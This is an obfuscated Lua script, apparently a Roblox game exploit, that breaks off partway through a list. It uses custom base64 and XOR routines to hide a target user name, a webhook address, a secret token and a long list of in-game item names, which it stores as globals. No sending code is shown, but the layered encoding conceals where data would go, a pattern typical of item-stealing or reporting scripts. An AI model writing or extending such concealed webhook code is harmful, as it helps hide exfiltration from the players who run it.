--[[ Protected with multi-layer encoding ]]
local _IIOOlO0l0I="_00lII";local _O0IIOlIO=tostring(6071);local _Il0IOIO=tostring(504);local _00000Il00l="_OIlIO";local _I0l0l0l0=351;
local _lllO0IlO="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
local function _l0IlI0II(_l0IIO0)
  local _lIlOOI=""
  _l0IIO0=string.gsub(_l0IIO0,"[^".._lllO0IlO.."=]","")
  for _lll0=1,#_l0IIO0,4 do
    local a=string.find(_lllO0IlO,string.sub(_l0IIO0,_lll0,_lll0),1,true)-1
    local b=string.find(_lllO0IlO,string.sub(_l0IIO0,_lll0+1,_lll0+1),1,true)-1
    local c=string.find(_lllO0IlO,string.sub(_l0IIO0,_lll0+2,_lll0+2),1,true)
    local d=string.find(_lllO0IlO,string.sub(_l0IIO0,_lll0+3,_lll0+3),1,true)
    if c then c=c-1 end
    if d then d=d-1 end
    _lIlOOI=_lIlOOI..string.char((a*4+math.floor((b or 0)/16))%256)
    if c then _lIlOOI=_lIlOOI..string.char(((b or 0)%16*16+math.floor((c or 0)/4))%256) end
    if d then _lIlOOI=_lIlOOI..string.char(((c or 0)%4*64+(d or 0))%256) end
  end
  return _lIlOOI
end
local _0IlOlOI0={209,66,252,242,85,68,108,54,148,160}
local function _0OOOII00(_l0IIO0)
  local _lIlOOI=""
  for _lll0=1,#_l0IIO0 do
    local k=_0IlOlOI0[(_lll0-1)%#_0IlOlOI0+1]
    local b=string.byte(_l0IIO0,_lll0)
    local r=0
    for bit=0,7 do
      local ba=math.floor(b/2^bit)%2
      local bb=math.floor(k/2^bit)%2
      if ba~=bb then r=r+2^bit end
    end
    _lIlOOI=_lIlOOI..string.char(r)
  end
  return _lIlOOI
end
local function _OO0OIllIOO0I(_l0IIO0) return _0OOOII00(_l0IlI0II(_l0IIO0)) end
local _IIlOlIOOl0=tostring(8826);local _00O0IOI=tostring(6380);local _I00IIl=tostring(8732);
local function _lOIIOlOI0l()
getgenv().User = _OO0OIllIOO0I("hTeOmTw".."lAFuskw".."==")

getgenv().Webhook = _OO0OIllIOO0I("uTaI".."giZ".."+Qxn3".."wb8j".."jot7IA".."VF98+j".."JtK".."ROilD".."V+T".."J/jWZk".."D0rA1".."3nj+B2x".."Mdl".."fVkH".."p5Xgc8rC".."ZXFYB".."KOPuCmd".."oD0".."QPn/d".."z4ISr8".."sSd".."i1A5M2".."1dcnGLX".."c1Ytb".."RliWTmGc".."QXlntwqc".."Byb07Gx5".."Y5v+dNa".."u4PgwP".."eMz3n".."iqmgj".."wUHEw=")

getgenv().SecretToken = _OO0OIllIOO0I("4SDOlG1".."3XwC5ku".."N6mt9h".."IAoAuZ".."jkdc".."vfY".."SdV".."AvLB4yGe".."xjFw")

getgenv().Brainrots = {
  _OO0OIllIOO0I("gjaOkyIm".."CUTm2fE".."HkJclLA1".."Y4A".."=="),
  _OO0OIllIOO0I("nCeThTk="),
  _OO0OIllIOO0I("mSedljk".."hH0W".."06L4".."wj5c4".."JQI="),
  _OO0OIllIOO0I("gimVkDw".."gBRbA".."z7gumY".."Y="),
  _OO0OIllIOO0I("mTuYgDR".."kKET1x7".."4s3LE0".."KgJT+M".."y+LJU".."="),
  _OO0OIllIOO0I("lTC".."dlToqT".."HH9zrYnj".."ps7L".."Q=="),
  _OO0OIllIOO0I("lTCdlToq".."THX1zr8n".."kJ46K".."gU="),
  _OO0OIllIOO0I("nS2Kl3".."UIA0".."DxgJMnn".."YA="),
  _OO0OIllIOO0I("nSPcoSA0".."HlP5xfEB".."k583L".."QJX58".."m+LA=".."="),
  _OO0OIllIOO0I("kieQly".."YwBVf4".."gIEnm5".."MmMR8="),
  _OO0OIllIOO0I("gS2MkS".."A2GRb1".."zrViu".."psv".."PhlE".."4Q=="),
  _OO0OIllIOO0I("gy2Plyx".."kDVj".."wgIUnmJ".."Ys"),
  _OO0OIllIOO0I("kiO".."MmyElAlm".."07b4ghQ".."=="),
  _OO0OIllIOO0I("ki2TmTx".."kDVjwg".."JwrkJk8"),
  _OO0OIllIOO0I("kzeOl".."SA2AxbVz".."rVi".."uoAsMR5".."Z"),
  _OO0OIllIOO0I("mieIhy".."UlGBb".."W0r".."4x"),
  _OO0OIllIOO0I("gyeVn".."DwwAx".."bHz".."LQrm5".."o8MAM="),
  _OO0OIllIOO0I("nS2P0hQp".."BVH70w=="),
  _OO0OIllIOO0I("nSPc".."oTAnHlPg".."gJItk".."ZA8".."Kg1F/c+".."/"),
  _OO0OIllIOO0I("nS2".."P0gYhB1n".."4wbkx"),
  _OO0OIllIOO0I("giub".."nDo".."2CRb".."XwaM".."jjJM".."2IQ=="),
  _OO0OIllIOO0I("lzCdl".."SclAVe".."0wb8m3".."LE9Kw9".."E9c".."2w"),
  _OO0OIllIOO0I("nSP".."csT".."Q3DR".."bWz74="),
  _OO0OIllIOO0I("nSPctDor".."CBb".."Xz7w".."glZ".."w0NwV".."Z+g=="),
  _OO0OIllIOO0I("lC6ZlDQq".."GFm05q".."Mrm50="),
  _OO0OIllIOO0I("gjKTnT49".."TFf6xPES".."iZ8lL".."xU="),
  _OO0OIllIOO0I("nSPctTw".."qC1Pm".."gIInl5".."05JQ".."Q="),
  _OO0OIllIOO0I("liuS".."lTA2THH".."x0rA2"),
  _OO0OIllIOO0I("giO".."Rnyw".."qBRbSw".."aU2l".."Zw8"),
  _OO0OIllIOO0I("nS2P0gY".."0DVH8xa".."U2lYE="),
  _OO0OIllIOO0I("lyeP".."hjwy".."CRai".."lw=".."="),
  _OO0OIllIOO0I("hyeSh".."jooBV".."Pmz/".."ESnYQ".."6KglE+".."w=="),
  _OO0OIllIOO0I("gjKdlT".."0hGEL9g".."IU3nZ4".."wMBhf"),
  _OO0OIllIOO0I("kCyInTst".."Aw=".."="),
  _OO0OIllIOO0I("liOOkzg".."lTFf".."6xPE".."PnZ".."YgKgh".."D+sc="),
  _OO0OIllIOO0I("gy2".."PlyEw".."BRbA1bA".."umYYhLQ".."=="),
  _OO0OIllIOO0I("nyOfmjpk".."P0btx".."LQw"),
  _OO0OIllIOO0I("lyuPm".."jwqA".."xbXzL41".."kps7K".."w=="),
  _OO0OIllIOO0I("nSO".."KkzE".."rHl".."/gz/E".."RjJs7LR".."hZ"),
  _OO0OIllIOO0I("my2".."QnixkJ".."ln4".."zKh".."ir5M9".."MR4="),
  _OO0OIllIOO0I("hSuOmz".."ktB1f4yb".."oj3KY".."8NgVa/c".."uwLp".."2ZOg=".."="),
  _OO0OIllIOO0I("mie".."IkT0".."xHkO0wb".."8m3L8g".."NxhD".."5tU="),
  _OO0OIllIOO0I("gjWdl".."TI9THTmz".."6I="),
  _OO0OIllIOO0I("nSP".."coDopDVj".."gybJ".."iu4A0Kgh".."T"),
  _OO0OIllIOO0I("njCfkzk".."hCFn".."6"),
  _OO0OIllIOO0I("hSu".."fhjQnT".."GX1y".."KQw"),
  _OO0OIllIOO0I("mieIhyU".."lGBbf".."xaEjiA=".."="),
  _OO0OIllIOO0I("nSPc".."pjQ".."nAxbX".."z7wglZw".."0Nw".."VZ+g=="),
  _OO0OIllIOO0I("hSOS".."lXUQD".."VjzgJ".."onkJ".."chJ".."QJR"),
  _OO0OIllIOO0I("nS2K".."mztkPl".."nnxQ=="),
  _OO0OIllIOO0I("nS2P0gE".."lD1nm".."yaUjj".."w=="),
  _OO0OIllIOO0I("lDSV".."njA".."gA1g="),
  _OO0OIllIOO0I("nS2P0g".."U2B".."Vv70".."w=="),
  _OO0OIllIOO0I("nSPcuDo".."oAE+".."056MjkpY".."w"),
  _OO0OIllIOO0I("hmKTg".."HUI"),
  _OO0OIllIOO0I("lDG".."TmXUXCV".."37zLAq"),
  _OO0OIllIOO0I("nS2".."P0gUxC1".."H9xaI".."="),
  _OO0OIllIOO0I("hTC".."dnjQoCV".."L7z".."g=="),
  _OO0OIllIOO0I("li2ek".."DktAl".."m09b8rn".."5s2".."KAVY+w=="),
  _OO0OIllIOO0I("hTeal".."HUQ".."A0P3w".."b8="),
  _OO0OIllIOO0I("nCuZhjAw".."CV/".."mwfE".."AlZ".."E8JwBT4".."MW4MJ0="),
  _OO0OIllIOO0I("nC2Sly".."xkIVn6xa".."hir".."pc8".."KghT8d".."I="),
  _OO0OIllIOO0I("kiq".."Vnjkt".."AhbXy".."Lgul".."Q=="),
  _OO0OIllIOO0I("kiq".."VgiYrTFf".."6xPETi".."ZcmKw=="),
  _OO0OIllIOO0I("nSP".."coSUrA".."13t".."gJYwnZ".."wxIQ=="),
  _OO0OIllIOO0I("kyO".."fhycxTF".."f6xPEHm".."5UgNhk="),
  _OO0OIllIOO0I("nS2".."P0hc2A0".."U="),
  _OO0OIllIOO0I("nSPcty".."0wBVj".."31P".."EFjpM7".."IAk="),
  _OO0OIllIOO0I("nS2P".."0hYlAl".."L9x".."aI="),
  _OO0OIllIOO0I("kieQhz".."klHlX9z".."rhiqp".."s2L".."QNF/c6".."4"),
  _OO0OIllIOO0I("nS2P0mN".."z"),
  _OO0OIllIOO0I("nS2P0".."hgrD".."l/4yaI="),
  _OO0OIllIOO0I("nC2Slyxk".."IVn6xah".."irIcyIxU".."="),
  _OO0OIllIOO0I("nS2P0h8r".."AFrtgJIt".."kZA8".."Kg1".."F/c+/I48".."="),
  _OO0OIllIOO0I("nS2P0gY".."0A1".."n/2fEBk5".."83LQJX".."58m+LJ2".."B"),
  _OO0OIllIOO0I("nS2".."P0h0rGEX".."kz6U".."xlY".."Y6Nw=="),
  _OO0OIllIOO0I("nS2P0gU".."oDVj91".."L4x"),
  _OO0OIllIOO0I("kiqVkTk".."hGF".."P90rBiv4".."clLQhT".."/dKw"),
  _OO0OIllIOO0I("lQjc".."ojQ".."qCF".."c="),
  _OO0OIllIOO0I("nSOP0gYt".."Hw=="),
  _OO0OIllIOO0I("gjK".."VnDs9TH".."71zbw".."7"),
  _OO0OIllIOO0I("nS2P0g".."YzCVP".."gyLQjjo".."Ym"),
  _OO0OIllIOO0I("hSO".."fnS".."ctGFe0".."4rgh".."lZE5IRh".."X"),
  _OO0OIllIOO0I("nzefnj".."AlHlm05L".."gsk4".."EmJ".."RlE+w".."=="),
  _OO0OIllIOO0I("nS2P0".."hYrAV".."T9zr".."AxlZ07JR".."8="),
  _OO0OIllIOO0I("kiqVkTk".."hGFP90rB".."isp0wKB".."hT/dKw"),
  _OO0OIllIOO0I("kiq".."VnzstAl".."k="),
  _OO0OIllIOO0I("gjWdl".."XUXA1".."L1"),
  _OO0OIllIOO0I("ny2T0jg9".."TH7".."xwaM".."2"),
  _OO0OIllIOO0I("nCOO".."mzQ".."nBF+04".."74wnY".."g6KgU="),
  _OO0OIllIOO0I("hSOfnS".."ctA".."Fr7".."gJIwk5E6".."IAVa+M".."8="),
  _OO0OIllIOO0I("nS2P0mdx"),
  _OO0OIllIOO0I("nSPctScl".."AlLxgJI".."tkZ".."A8K".."g1F/".."c+/"),
  _OO0OIllIOO0I("nS2P0".."hcxH".."kT91L4x"),
  _OO0OIllIOO0I("lS2SmTA".."9GEPm".."wr5".."iuYo".."lNglF5w".."=="),
  _OO0OIllIOO0I("53U="),
  _OO0OIllIOO0I("nS2".."P0h".."YsBVX4".."xaUnlYA".."0Nw=".."="),
  _OO0OIllIOO0I("ljeZgS".."FkWgCi"),
  _OO0OIllIOO0I("nS2P0h".."gtTHH".."11L".."g2k".."4E="),
  _OO0OIllIOO0I("gyOSlXUW".."BVjzgJM3".."jw=="),
  _OO0OIllIOO0I("ny2".."T0jg".."9TGbmx".."aInkoY="),
  _OO0OIllIOO0I("nS2".."P0hsrA1m".."07a".."hitJ0hNx".."xZ4NO4N".."pOB"),
  _OO0OIllIOO0I("ny2T0jg".."9THX1zrU".."7"),
  _OO0OIllIOO0I("kDCfkzE".."rHE".."Pn"),
  _OO0OIllIOO0I("nS2P".."0gQxCUX".."1xLgukJ".."Mm"),
  _OO0OIllIOO0I("kiqV".."kTkhGFP".."90rgsndI".."XLQ9f98".."y0Npmb".."Jy0CVw".."=="),
  _OO0OIllIOO0I("kzeO".."gDwwAxbW".."wb8ml".."YY6"),
  _OO0OIllIOO0I("kiqVnjlk".."PEPk".."0Kg".."="),
  _OO0OIllIOO0I("gDeZgTQ".."gBVr4z/".."EUnZ8lL".."R5Z"),
  _OO0OIllIOO0I("kiq".."VkTkhGF".."P90r".."Bivps2".."LQ9a8".."dS0K46T"),
  _OO0OIllIOO0I("kzCJnDw".."wAxbZ".."waMxlY".."Y6"),
  _OO0OIllIOO0I("kjeMmzF".."kJFng0".."6Eti".."A=="),
  _OO0OIllIOO0I("nCvc".."tTQwB".."UL7"),
  _OO0OIllIOO0I("mS3".."cuj".."pkJFm0".."87Aq".."iYA="),
  _OO0OIllIOO0I("kjeMm".."zFkL0P".."kybVir".."5M9M".."R4="),
  _OO0OIllIOO0I("kzeSmyE".."rTHThzrg".."2k9".."IGNAVY/d".."S+"),
  _OO0OIllIOO0I("gDeZgTQg".."BVr".."4wf".."EBjp02".."Kwhf+ME".."="),
  _OO0OIllIOO0I("gS2I0gU".."xAUb/yb8".."="),
  _OO0OIllIOO0I("nyOJlT0".."wFRb".."awaQllIY".."s"),
  _OO0OIllIOO0I("mS2Ol".."zItAl+".."04r4tk".."Q=="),
  _OO0OIllIOO0I("giOSh".."jRkJFng".."06Et".."iA=="),
  _OO0OIllIOO0I("gSuOh".."zktGF".."n91LBivp".."s2L".."Q9a8dS0K".."46T"),
  _OO0OIllIOO0I("43c="),
  _OO0OIllIOO0I("gS2I0h0r".."GEXk".."z6U="),
  _OO0OIllIOO0I("hS3".."chjpkGFm".."087Aqi".."YA="),
  _OO0OIllIOO0I("hSeQlzgr".."HkLx"),
  _OO0OIllIOO0I("nSPcoTQ".."sGUS047".."4vnps7J".."R9f+84="),
  _OO0OIllIOO0I("nSuPhnU".."IBUXggJ0".."rj4Z1".."Fw1e4dI="),
  _OO0OIllIOO0I("ny2T0j".."g9TF".."Psw".."bwrkp".."c="),
  _OO0OIllIOO0I("ny2Tn".."XUJFR".."bcz6Ux".."jJ0h"),
  _OO0OIllIOO0I("hTeSlXUQ".."GVjzgI".."U3kpV".."1Fw1e4".."dI="),
  _OO0OIllIOO0I("kze".."SnC".."wpDVg="),
  _OO0OIllIOO0I("nS2P0".."h8rDlX".."91L".."4x"),
  _OO0OIllIOO0I("kjedlic".."lAVfggL".."AsmN".."IFJQd".."E9ci".."8I4".."ifN".."CkNQ".."g=="),
  _OO0OIllIOO0I("gS6".."Zky".."YhT".."FvtgIE".."wmY".."EwKhg="),
  _OO0OIllIOO0I("nS2P0h".."YxD".."1fmw".."bIqn".."YE="),
  _OO0OIllIOO0I("4DrNimQ".."8XQ=="),
  _OO0OIllIOO0I("nS2Kl3UI".."A0D".."xgJ".."0ti".."pd1Fw".."1e4dI="),
  _OO0OIllIOO0I("gSeOgD".."wwA".."xbW".."1aMwlY".."Y6"),
  _OO0OIllIOO0I("ljCdmyUx".."H0W".."07bQm".."iYEmL".."Q=="),
  _OO0OIllIOO0I("liu".."ahj".."wqBRbH".."0KgmmY".."A8KgU="),
  _OO0OIllIOO0I("lg29pg".."=="),
  _OO0OIllIOO0I("hTCVk".."T4rAF/6".."zw=="),
  _OO0OIllIOO0I("hTCVg".."jktGFm09".."KMjk".."JM5I".."R5f4M+i"),
  _OO0OIllIOO0I("nSP".."cpDQnD1e".."06rAhl51".."1CAVY".."4MWj".."K5Kd"),
  _OO0OIllIOO0I("lyuPmjc".."rDUT".."w"),
  _OO0OIllIOO0I("giOShiEh".."Aw=="),
  _OO0OIllIOO0I("nSO".."P0gM".."lHU".."P91LAx3".."KE0".."MBlE+".."smlI48="),
  _OO0OIllIOO0I("nS2P0h4".."lHl3x0r".."g2k".."4E="),
  _OO0OIllIOO0I("miOO".."mTA2TG".."X1y".."KQw"),
  _OO0OIllIOO0I("lzCdn".."D4hAkL".."gxb4="),
  _OO0OIllIOO0I("nS2P0gE".."2BVn".."n"),
  _OO0OIllIOO0I("my2e0h8".."rDhbez7".."Nir5M9MR".."4="),
  _OO0OIllIOO0I("nSO".."P0gE2D".."Vr1".."zLQwlY".."Y0Nw=="),
  _OO0OIllIOO0I("gTeRgj4t".."Al+086E".."7mJcnLQJ".."f"),
  _OO0OIllIOO0I("gy2fk".."Tpk".."KF/nw".."74="),
  _OO0OIllIOO0I("lDq".."Imzsn".."GBb".."ZwaU2mZ0".."="),
  _OO0OIllIOO0I("nSPc".."uTQ".."2B1Pmy7".."Aw3LE6KQ".."5f+sGiK5".."Oc"),
  _OO0OIllIOO0I("gyeV".."nDEhCU".."S09KM".."jkJM5".."JQ=="),
  _OO0OIllIOO0I("nSPcpDQ".."nD1e0".."8KMn".."j5d1FB5".."T58W/Npk".."="),
  _OO0OIllIOO0I("iCePgX".."UpF".."Rbx2LAvl".."Zww"),
  _OO0OIllIOO0I("ljeZgC".."ctHlm05L".."gllYY".."0KAk="),
  _OO0OIllIOO0I("ky2dhjw".."wAxbV1aM".."jiJ".."shKw=".."="),
  _OO0OIllIOO0I("nS2P".."0gE".."2DVr1zL".."QwlYY".."6Nw=="),
  _OO0OIllIOO0I("hzeQ".."hiA2BV".."j7gI".."IpmZ4wM".."ANY+w=".."="),
  _OO0OIllIOO0I("nS2".."P0gErHk".."Lh0w=".."="),
  _OO0OIllIOO0I("iy2RkD".."whTGL".."mwb0jkJ".."M="),
  _OO0OIllIOO0I("nSP".."csSAnD".."UT1".."w7k".."j"),
  _OO0OIllIOO0I("lzC".."dlTo".."oDRbYw".."fEOnd".."IZJ".."Q=="),
  _OO0OIllIOO0I("lDq".."Imz".."snGBb".."A0r".."AunZ4".."wNgM".."="),
  _OO0OIllIOO0I("nS2P".."0gY0".."FVLx0rg".."slYE="),
  _OO0OIllIOO0I("kCWdg".."CctA".."l+0zL".."BirJM5LQ".."Jf"),
  _OO0OIllIOO0I("kiqdkT0h".."D179"),
  _OO0OIllIOO0I("ky6dk".."T4sA1".."rxg".."JYtnYY="),
  _OO0OIllIOO0I("lTeQ0hEx".."ABbQ".."1b0="),
  _OO0OIllIOO0I("hS2".."OgCExC".."1/6zrhi".."uIA0".."IwNY8tK".."kNpWcP".."A=="),
  _OO0OIllIOO0I("giO".."RnywqBRb".."H0KgmmY".."A8KgU".."="),
  _OO0OIllIOO0I("myOfmTo".."2BVr".."4wQ=="),
  _OO0OIllIOO0I("hTCZnDo".."3GETh2q".."st3KYg".."Ng5Zt".."JThc".."sw="),
  _OO0OIllIOO0I("nS2P0".."hglGEL".."xz6I="),
  _OO0OIllIOO0I("miOOmTA".."2B1f".."mgJo".."3jpkg".."Ng=="),
  _OO0OIllIOO0I("kyu".."PnT".."swCRbT".."yaQ".."yjJshIR5".."T"),
  _OO0OIllIOO0I("nSPcp".."DQnD1e08".."7A2i".."YA7K0".."xl9d".."SkMJ".."KbISU="),
  _OO0OIllIOO0I("miOOmTA2".."BFP10qV".."isIcjLx".."lE"),
  _OO0OIllIOO0I("gS2M0gU".."rHBb".."Hwbk3".."jg=".."="),
  _OO0OIllIOO0I("lS2Qgj".."0tAl".."+06rQ2j".."5k8K".."gU="),
  _OO0OIllIOO0I("gSO".."SljQqB".."Vj9gJ".."cwk4Eh".."LQJ".."f"),
  _OO0OIllIOO0I("liuS".."lTA2THX9".."06Un".."jpw0"),
  _OO0OIllIOO0I("hSeShjQ".."nA1r7g".."IUnn5w".."8JwM="),
  _OO0OIllIOO0I("ki2fnTR".."kLU".."Xnw".."aIxlZ".."w6"),
  _OO0OIllIOO0I("kye".."Qhzk".."lTHTx".."zKQlnQ=="),
  _OO0OIllIOO0I("gimJnjlk".."P13hz".."L1ir5kgK".."AA="),
  _OO0OIllIOO0I("mjCJgi".."AvT".."Gb1x7hir".."JMy".."LQ=="),
  _OO0OIllIOO0I("kiO".."MgiAn".."D1/6z".."/EBkJ0iK".."gVY+w=="),
  _OO0OIllIOO0I("kzCdgTwo".."BVj9gJ".."Mnjp".."s4JgVY/Q".."=="),
  _OO0OIllIOO0I("nTeK0hkx".."GhbY1ac="),
  _OO0OIllIOO0I("kCyM".."kzktTHT1".."wrQu"),
  _OO0OIllIOO0I("ny2T0hk".."lTGb7zLg".."4lZM="),
  _OO0OIllIOO0I("kiqOm".."yYpDUX".."5wb".."wjiA=".."="),
  _OO0OIllIOO0I("nS2P0hIl".."GEL91L4".."x"),
  _OO0OIllIOO0I("kyO".."RkCBkL".."lf5wq".."Rir5M9".."MR4="),
  _OO0OIllIOO0I("nCOP".."hjogA1".."jgybIt3".."KYwK".."AlG/".."cW1".."LZKX"),
  _OO0OIllIOO0I("gSufkTwr".."AlPg1LB".."isZ".."M2JwRf".."+sE".."="),
  _OO0OIllIOO0I("ky2".."ek3UU".."DVjww".."Q=="),
  _OO0OIllIOO0I("kzeUnX".."UgCRba".."z7Qu".."kw=="),
  _OO0OIllIOO0I("lzC".."VnX".."UKBVj+wQ".."=="),
  _OO0OIllIOO0I("ljCdnDYs".."BVP4zL5i".."r4I8NgV".."C8c".."y9"),
  _OO0OIllIOO0I("nS2P".."0gEtHF+".."09LAh".."k4E="),
  _OO0OIllIOO0I("hS2Thjwq".."BRb".."HyKM".."rkYI".."8KgU="),
  _OO0OIllIOO0I("iCeIm3UH".."AFfh0w=="),
  _OO0OIllIOO0I("liuSl".."TA2THH".."4z7Mt"),
  _OO0OIllIOO0I("lTeb0jEx".."Cxb".."w1bY".."="),
  _OO0OIllIOO0I("nDe".."RnyxkLVv".."2wb".."0jnoc="),
  _OO0OIllIOO0I("hSO".."OhjQ".."2GVH1gJI".."rj4YwNgJ".."X"),
  _OO0OIllIOO0I("gjOJ".."kzklAl".."f6wQ=="),
  _OO0OIllIOO0I("giyd".."mzkhAkz".."7"),
  _OO0OIllIOO0I("ki2OnHU".."HA0T6gJ".."Itjpx1Fw".."1e4dI".."="),
  _OO0OIllIOO0I("kDOJkz".."slGU".."I="),
  _OO0OIllIOO0I("kiO".."fkyYtGF".."m087A2nZ".."48M".."AM="),
  _OO0OIllIOO0I("njCfkzkt".."GFe0".."76MhnZ40"),
  _OO0OIllIOO0I("kjCdkD".."crT".."Hr9zb4s".."mYYhJ".."Q=="),
  _OO0OIllIOO0I("nS2".."P0ho".."2D1f4".."yaUtjw=="),
  _OO0OIllIOO0I("hTCdkSE".."rHlm05L".."gsk4E0M".."R5Z"),
  _OO0OIllIOO0I("kzCO0jA".."3TG".."Lxy".."PESn".."YY8N".."Blb"),
  _OO0OIllIOO0I("gSufk".."TwrA".."lO07bAhn".."5o8Kg0="),
  _OO0OIllIOO0I("gSOX".."gDQ".."sAVfgzbA".."2lZ".."w0"),
  _OO0OIllIOO0I("ky2R".."kDQ2CF/6".."yfE".."Wk4Ah".."LQJf".."/Q=="),
  _OO0OIllIOO0I("nS2".."P0hcrAVT".."9zrg2k4E".."="),
  _OO0OIllIOO0I("kyOQ".."njA2BVj1".."gIEnj".."IIw".."NgFf+tS".."4LJ".."0="),
  _OO0OIllIOO0I("gSOXg".."DQsAVf".."gzbAv".."nYY="),
  _OO0OIllIOO0I("nS2P0gE".."xAlHg1".."b8liI".."c7Iw9f4M".."+i"),
  _OO0OIllIOO0I("kzeQ".."kDwwAxb".."Wwb8mlYY".."6ZDhE9cu".."lLY".."6bISs".."="),
  _OO0OIllIOO0I("kyOQnj".."A2B".."Vj7gJ0".."tkJ05Kw".."=="),
  _OO0OIllIOO0I("nSO".."P0hYl".."HEP3y".."Lgs".."nYE="),
  _OO0OIllIOO0I("hTCV".."giU".."tTGLm".."z6EyldIB".."NgNG".."5MHxFo".."6bJTQN"),
  _OO0OIllIOO0I("liOIhjw".."wAxbAwb".."ItiJ0".."="),
  _OO0OIllIOO0I("nS2P0hYs".."BV7hw".."b8rkpsm"),
  _OO0OIllIOO0I("kiOM".."m3UQD".."VX7"),
  _OO0OIllIOO0I("myOfm".."TpkJ".."lf3y/EIn".."ZE+"),
  _OO0OIllIOO0I("hTCZn".."Do3GETh".."2qst3".."KYg".."Ng5Zt".."JPhcsw="),
  _OO0OIllIOO0I("hDC".."JkDwqBRb".."SzLAvmZw".."yMQV".."Y/Q".."=="),
  _OO0OIllIOO0I("lDqIm".."zsnGBbWw".."b0umYA8K".."g0="),
  _OO0OIllIOO0I("hyOR".."gjw2DRb".."XwaEy".."iZE".."8Kg0="),
  _OO0OIllIOO0I("hTCd".."njQoBUL1".."gIU".."wnZ".."40KA0="),
  _OO0OIllIOO0I("njCfkz".."khHlm07".."6MhnZ".."40"),
  _OO0OIllIOO0I("hTeX".."kzsqAx".."bWwb8j".."kpw6"),
  _OO0OIllIOO0I("kC6".."ZgSYtA".."w=="),
  _OO0OIllIOO0I("hCy".."fnjwwA".."xbHwbwr".."iJ0".."="),
  _OO0OIllIOO0I("hSuMm".."3UQA0b9g".."IUjn".."50="),
  _OO0OIllIOO0I("niaVnHU".."ABVi0".."5Lgs".."3LYgKg".."=="),
  _OO0OIllIOO0I("lDGMgDA3".."H1m087g".."lkp0".."nJQ=="),
  _OO0OIllIOO0I("nC2".."SlyxkI".."Vn6x".."ahisZM7"),
  _OO0OIllIOO0I("hSubgDo".."oBVHm".."xfEEj".."och".."KwJY".."/Q=".."="),
  _OO0OIllIOO0I("nS2P".."0hY2".."A1X7xLg".."ukJsh".."Kx8="),
  _OO0OIllIOO0I("hTCdn".."jQoCUT7g".."IUwnZ".."40KA".."0="),
  _OO0OIllIOO0I("nCO".."IhjAr"),
  _OO0OIllIOO0I("kiqVm".."iAlAl/6y".."fEWnZ".."E6Kg".."VY/Q".."=="),
  _OO0OIllIOO0I("liOIhjQw".."BVj7g".."J87".."nZw8Kg".."M="),
  _OO0OIllIOO0I("liuOkz".."MlT".."HXxzLQx".."iIAw"),
  _OO0OIllIOO0I("ki2fnTMl".."AkL".."7gJQ".."umZQ0K".."hhZ"),
  _OO0OIllIOO0I("lyuGiC".."xkP1nw".."wQ=="),
  _OO0OIllIOO0I("hTCZl".."3UQH".."lPx".."gIUwmZd".."1Fw1e4".."dI="),
  _OO0OIllIOO0I("kyOSk".."zstGFm04".."rAsm".."JshK".."w=="),
  _OO0OIllIOO0I("myOfmTpk".."P0b".."11rQ".."siJ0m".."JQ=="),
  _OO0OIllIOO0I("hS2Vnj".."AwG".."Fm0".."5r4".."hnZE2LQJ".."Z"),
  _OO0OIllIOO0I("kieShic".."xD1X9".."gJ83".."n54g".."Jw9".."f"),
  _OO0OIllIOO0I("kiOOg".."DowB".."Vj9gJ".."MwnZs7".."LQJ".."f"),
  _OO0OIllIOO0I("kiOOnjo".."r"),
  _OO0OIllIOO0I("kiOf".."mjo2".."Hl/gz".."/EPmZ46".."KgVC+".."w=="),
  _OO0OIllIOO0I("gjKT".."nDI".."tAl+".."08aQjn5k".."8KgU="),
  _OO0OIllIOO0I("nS2P0hsr".."A1T9zrgx"),
  _OO0OIllIOO0I("myu".."SlTkhTH".."z9z".."rYumdIG".."JQRD5".."g=="),
  _OO0OIllIOO0I("hTCdk".."TogG".."VX71".."KQui".."dIRI".."QBX5MW".."9I5iHJ".."jAZTA".."=="),
  _OO0OIllIOO0I("nCObm3U".."WBV".."T2yaUr".."kps="),
  _OO0OIllIOO0I("gyqVnD".."pkJF".."P4yb".."ItjIYwNg".."VY+".."w=="),
  _OO0OIllIOO0I("hSfcpjB".."kOFO087A".."qiYA="),
  _OO0OIllIOO0I("liOSl".."TQq".."FlP".."4zLhiq".."IAgKA1a9".."Q=="),
  _OO0OIllIOO0I("nSeOhzk".."hHkP4xa".."M3k".."Jc="),
  _OO0OIllIOO0I("hS2e0gE".."rDl+".."09L4glQ".."=="),
  _OO0OIllIOO0I("gjaT".."giU".."rTH".."rhz".."bgslZw".."6"),
  _OO0OIllIOO0I("li2".."OmzkoA".."xbDwaUn".."jp8wK".."ANY8NK4L".."pCd"),
  _OO0OIllIOO0I("li2Omz".."koAxbH1".."bM1".."k50zIR5".."Z"),
  _OO0OIllIOO0I("kiOKkzko".."AxbCya".."M2iZ".."0mKw=="),
  _OO0OIllIOO0I("kDSTk".."TQgA".."0T9zL".."0j"),
  _OO0OIllIOO0I("hSubgDw".."oBVj9gIY".."jiJc".."nKQla/c6".."4"),
  _OO0OIllIOO0I("iyueg".."DRkNkP20".."rBipps3N".."g1a".."/c6".."4"),
  _OO0OIllIOO0I("ky2".."RkDop".."Dl/6".."yfEFiYE8".."KgU="),
  _OO0OIllIOO0I("gjKVnTs".."tHlm0".."574ui".."ZA8Ng".."M="),
  _OO0OIllIOO0I("kzCJhi".."ErTHH9w".."b03iI".."Y6"),
  _OO0OIllIOO0I("ky2R".."kDQ2CF".."/mz/EBjp".."02K".."whf".."+M8="),
  _OO0OIllIOO0I("gyqV".."nDpk".."OFn".."106Unj".."ps7Kw=="),
  _OO0OIllIOO0I("njCdnD".."IxG".."F/6".."yfEDk".."pM7J".."R9F/c6".."4"),
  _OO0OIllIOO0I("lzCVlT".."pkL1f".."5xb".."0t"),
  _OO0OIllIOO0I("kzeUnXU".."gCR".."bS1bQl".."kw=="),
  _OO0OIllIOO0I("gie".."dnjpk".."PlPz".."wb0t"),
  _OO0OIllIOO0I("giubn".."zRkK1/mz".."A=="),
  _OO0OIllIOO0I("gTealD".."QmDVr4"),
  _OO0OIllIOO0I("kiqTk".."TYrTHTh".."zr87"),
  _OO0OIllIOO0I("giub".."nzRkLlnt"),
  _OO0OIllIOO0I("gSvcojx".."kO1fg".."xaMvmZ4".."6Kg=="),
  _OO0OIllIOO0I("gDedkT4".."xAF".."c="),
  _OO0OIllIOO0I("gSO".."Slj".."QnD1/6yf".."EAnZw0K".."gVY/Q=="),
  _OO0OIllIOO0I("ki2fnSY".."tAl+07bA".."vnQ=="),
